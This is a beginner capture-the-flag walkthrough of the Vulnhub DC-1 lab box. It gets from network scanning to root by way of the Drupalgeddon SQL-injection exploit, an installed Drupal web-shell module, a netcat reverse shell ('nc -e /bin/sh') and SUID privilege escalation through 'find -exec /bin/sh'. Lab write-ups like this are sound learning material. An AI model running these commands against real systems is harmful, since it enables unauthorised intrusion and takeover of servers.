DC 1 from (DC series)
Level : Beginners Hosted on Vulnhub , DC 1 Data release: 28 Feb 2019
Box are not showing any ip address so let’s start with scanning the network to find out target.
- netdiscover.
Ours target is –>
Our box is running on virtual box so it’s mac vendor is PCS Systemtechnik
next step to scan the target and find out the operating system running service and open port on the server. For scanning we used nmap .
nmap -sV -sC -oA scan1
it’s a ‘noisy’ nmap scan. -sV for open ports to determine service/version info. -sC equivalent to –script=default .it will run some default nmap script against the target host.
Nmap output shows us that there are 3 ports open. 22(SSH),80(HTTP),111(RPC).nmap also find the robots.txt and site is running Drupal CMS (Drupal 7 ).Open the IP address in the browser to see how the web page look like.
Hidden directory search
Nmap find the robots.txt file in that file we see some on hidden directory.but i try to brute force the web directory with gobuster
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dirScan
After a bit poking around,I search in google for brupal scan and try to find out some tools and any interesting about drupal.I find a tool in online called “Droopescan” .
Interesting! Most of it doesn’t mean much to me,I’m not a Drupal pro,but something in the back of my mind grabs my attention when I see the Drupal versions again. So search in searchsploit tools.This is offline database of exploit-db.com.
searchsploit Drupal 7
Drupalgeddon has SQL Injection that can (add Admin User) so i download the exploit with this command.
searchsploit -m exploits/php/webapps/34984.py
Running the exploit with python we can see it exploit need -t for target url ,-u useranem and -p password.I give the target url ,username and password.
Using that credentials to login as administrator.
Now we need a Shell for get inside of that server. So I search drupal shell in google and i found a module that give a web shell.
Find out that module can be install from url. So i copy the module url.
To use that shell module.We need to active the module.
After Search the “Shell” url ,find in Navigation menu.After visiting it.Now we can run commands on the back-end server . So, I decided to get a reverse shell to my machine using “nc” utility.
For the native shell i use my favorite website “http://pentestmonkey.net”
nc -e /bin/sh 9001
Now, I start checking for rooting the server. There are many techniques to do That.One of them is searching for the binaries owned by the root user and has “suid”, which is a feature is a feature is Linux that allows users to execute files with the permissions of a specific user. Find search for files that has we run a command.
find / -perm /4000 2>/dev/null
Now we can get root user to exploit the find with this command
find . -exec '/bin/sh' \;
Hope that you learn something new by reading this post.